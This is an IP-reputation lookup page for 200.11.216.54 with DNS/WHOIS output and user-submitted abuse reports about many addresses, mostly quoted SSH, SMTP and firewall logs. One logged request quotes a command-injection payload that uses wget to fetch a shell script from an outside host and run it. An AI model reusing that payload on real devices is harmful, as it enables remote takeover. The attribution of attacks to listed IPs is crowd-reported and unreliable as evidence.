200.11.216.54 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Venezuela, Bolivarian Republic of

运营商(isp): CANTV Servicios Venezuela

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Fixed Line ISP

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackbots	Unauthorized connection attempt from IP address 200.11.216.54 on Port 445(SMB)	2019-09-09 05:16:12

相同子网IP讨论:

IP	类型	评论内容	时间
200.11.216.11	attackspambots	139/tcp 139/tcp [2020-02-19]2pkt	2020-02-20 00:15:41

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 200.11.216.54
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 17893
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;200.11.216.54.			IN	A

;; AUTHORITY SECTION:
.			3163	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019090800 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Mon Sep 09 05:16:07 CST 2019
;; MSG SIZE  rcvd: 117

HOST信息:

54.216.11.200.in-addr.arpa domain name pointer 200-11-216-54.estatic.cantv.net.

NSLOOKUP信息:

Server:		67.207.67.2
Address:	67.207.67.2#53

Non-authoritative answer:
54.216.11.200.in-addr.arpa	name = 200-11-216-54.estatic.cantv.net.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
91.61.38.231	attackspambots	SSH login attempts brute force.	2019-06-22 18:34:44
78.46.61.245	attack	20 attempts against mh-misbehave-ban on pluto.magehost.pro	2019-06-22 18:28:19
177.139.153.186	attackbotsspam	Jun 17 11:18:49 cumulus sshd[11842]: Invalid user lievens from 177.139.153.186 port 46476 Jun 17 11:18:49 cumulus sshd[11842]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=177.139.153.186 Jun 17 11:18:51 cumulus sshd[11842]: Failed password for invalid user lievens from 177.139.153.186 port 46476 ssh2 Jun 17 11:18:51 cumulus sshd[11842]: Received disconnect from 177.139.153.186 port 46476:11: Bye Bye [preauth] Jun 17 11:18:51 cumulus sshd[11842]: Disconnected from 177.139.153.186 port 46476 [preauth] Jun 17 11:26:32 cumulus sshd[12773]: Invalid user rexmen from 177.139.153.186 port 51433 Jun 17 11:26:32 cumulus sshd[12773]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=177.139.153.186 Jun 17 11:26:34 cumulus sshd[12773]: Failed password for invalid user rexmen from 177.139.153.186 port 51433 ssh2 Jun 18 11:37:20 cumulus sshd[29846]: Invalid user roehl from 177.139.153.186 port 50316 Jun........ -------------------------------	2019-06-22 18:24:47
103.94.130.4	attackspambots	Invalid user cube from 103.94.130.4 port 41059	2019-06-22 18:05:33
218.69.91.84	attack	Jun 22 05:26:23 MK-Soft-VM7 sshd\[28203\]: Invalid user postgres from 218.69.91.84 port 46231 Jun 22 05:26:23 MK-Soft-VM7 sshd\[28203\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.69.91.84 Jun 22 05:26:25 MK-Soft-VM7 sshd\[28203\]: Failed password for invalid user postgres from 218.69.91.84 port 46231 ssh2 ...	2019-06-22 18:07:15
181.197.90.190	attackbotsspam	Port Scan detected from 181.197.90.190 (PA/Panama/-). 4 hits in the last 35 seconds	2019-06-22 18:42:56
45.82.153.2	attack	Jun 22 11:57:53 h2177944 kernel: \[2541459.207426\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=45.82.153.2 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=244 ID=55969 PROTO=TCP SPT=51416 DPT=2506 WINDOW=1024 RES=0x00 SYN URGP=0 Jun 22 12:02:14 h2177944 kernel: \[2541719.442763\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=45.82.153.2 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=244 ID=22230 PROTO=TCP SPT=51416 DPT=3342 WINDOW=1024 RES=0x00 SYN URGP=0 Jun 22 12:05:26 h2177944 kernel: \[2541912.093943\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=45.82.153.2 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=244 ID=987 PROTO=TCP SPT=51416 DPT=3368 WINDOW=1024 RES=0x00 SYN URGP=0 Jun 22 12:10:24 h2177944 kernel: \[2542209.856953\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=45.82.153.2 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=244 ID=52719 PROTO=TCP SPT=51416 DPT=3247 WINDOW=1024 RES=0x00 SYN URGP=0 Jun 22 12:11:13 h2177944 kernel: \[2542258.968597\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=45.82.153.2 DST=85.214.117.9 LEN=40 TOS=	2019-06-22 18:22:11
58.242.83.37	attack	2019-06-22T06:58:56.414474Z \[cowrie.ssh.factory.CowrieSSHFactory\] New connection: 58.242.83.37:11745 $107.175.91.48:22$ \[session: 37722ea3d8e6\] 2019-06-22T06:59:41.240465Z \[cowrie.ssh.factory.CowrieSSHFactory\] New connection: 58.242.83.37:49304 $107.175.91.48:22$ \[session: 740fc06a61e2\] ...	2019-06-22 18:30:22
189.208.238.246	attackspam	MultiHost/MultiPort Probe, Scan, Hack -	2019-06-22 18:20:07
162.144.64.149	attackbotsspam	[2019-06-22 00:25:10] NOTICE[4006] chan_sip.c: Registration from '"14235" ' failed for '162.144.64.149:5117' - Wrong password [2019-06-22 00:25:10] SECURITY[4013] res_security_log.c: SecurityEvent="InvalidPassword",EventTV="2019-06-22T00:25:10.333-0400",Severity="Error",Service="SIP",EventVersion="2",AccountID="14235",SessionID="0x7fd8040027a0",LocalAddress="IPV4/UDP/142.93.153.17/5060",RemoteAddress="IPV4/UDP/162.144.64.149/5117",Challenge="614f5b3f",ReceivedChallenge="614f5b3f",ReceivedHash="4f43eac99765e32d2772b2e22bea17a6" [2019-06-22 00:25:10] NOTICE[4006] chan_sip.c: Registration from '"14235" ' failed for '162.144.64.149:5117' - Wrong password [2019-06-22 00:25:10] SECURITY[4013] res_security_log.c: SecurityEvent="InvalidPassword",EventTV="2019-06-22T00:25:10.533-0400",Severity="Error",Service="SIP",EventVersion="2",AccountID="14235",SessionID="0x7fd804052160",LocalAddress="IPV4/UDP/142.93.153.17/5060",RemoteAddress="IPV4/UDP/162.144.64.149/5117",Challe	2019-06-22 18:39:52
218.166.72.90	attack	TCP port 445 (SMB) attempt blocked by firewall. [2019-06-22 06:25:04]	2019-06-22 18:09:17
77.27.40.96	attackspambots	Jun 18 21:47:11 h2421860 postfix/postscreen[8772]: CONNECT from [77.27.40.96]:37730 to [85.214.119.52]:25 Jun 18 21:47:11 h2421860 postfix/dnsblog[8775]: addr 77.27.40.96 listed by domain ix.dnsbl.xxxxxx.net as 127.0.0.2 Jun 18 21:47:11 h2421860 postfix/dnsblog[8776]: addr 77.27.40.96 listed by domain bl.spamcop.net as 127.0.0.2 Jun 18 21:47:11 h2421860 postfix/dnsblog[8776]: addr 77.27.40.96 listed by domain zen.spamhaus.org as 127.0.0.3 Jun 18 21:47:11 h2421860 postfix/dnsblog[8776]: addr 77.27.40.96 listed by domain zen.spamhaus.org as 127.0.0.4 Jun 18 21:47:11 h2421860 postfix/dnsblog[8776]: addr 77.27.40.96 listed by domain Unknown.trblspam.com as 185.53.179.7 Jun 18 21:47:11 h2421860 postfix/dnsblog[8777]: addr 77.27.40.96 listed by domain b.barracudacentral.org as 127.0.0.2 Jun 18 21:47:11 h2421860 postfix/dnsblog[8780]: addr 77.27.40.96 listed by domain dnsbl.sorbs.net as 127.0.0.6 Jun 18 21:47:12 h2421860 postfix/postscreen[8772]: PREGREET 46 after 1.2 from [77........ -------------------------------	2019-06-22 18:48:01
185.220.101.34	attackbots	pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=185.220.101.34 user=root Failed password for root from 185.220.101.34 port 33410 ssh2 Failed password for root from 185.220.101.34 port 33410 ssh2 Failed password for root from 185.220.101.34 port 33410 ssh2 Failed password for root from 185.220.101.34 port 33410 ssh2	2019-06-22 18:14:14
185.36.81.168	attackspambots	Jun 22 09:05:30 postfix/smtpd: warning: unknown[185.36.81.168]: SASL LOGIN authentication failed	2019-06-22 18:13:14
106.13.6.61	attackspambots	106.13.6.61 - - [22/Jun/2019:06:25:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ...	2019-06-22 18:40:48

最近上报的IP列表

41.176.44.107	109.61.255.243	5.39.35.244	121.244.87.86
183.82.54.178	180.252.143.200	123.135.143.57	141.208.121.196
184.82.193.244	23.92.218.172	14.163.224.188	110.45.81.12
193.21.150.138	150.110.129.87	80.16.180.141	94.191.59.106
198.64.56.145	150.94.159.178	14.191.72.219	176.59.73.204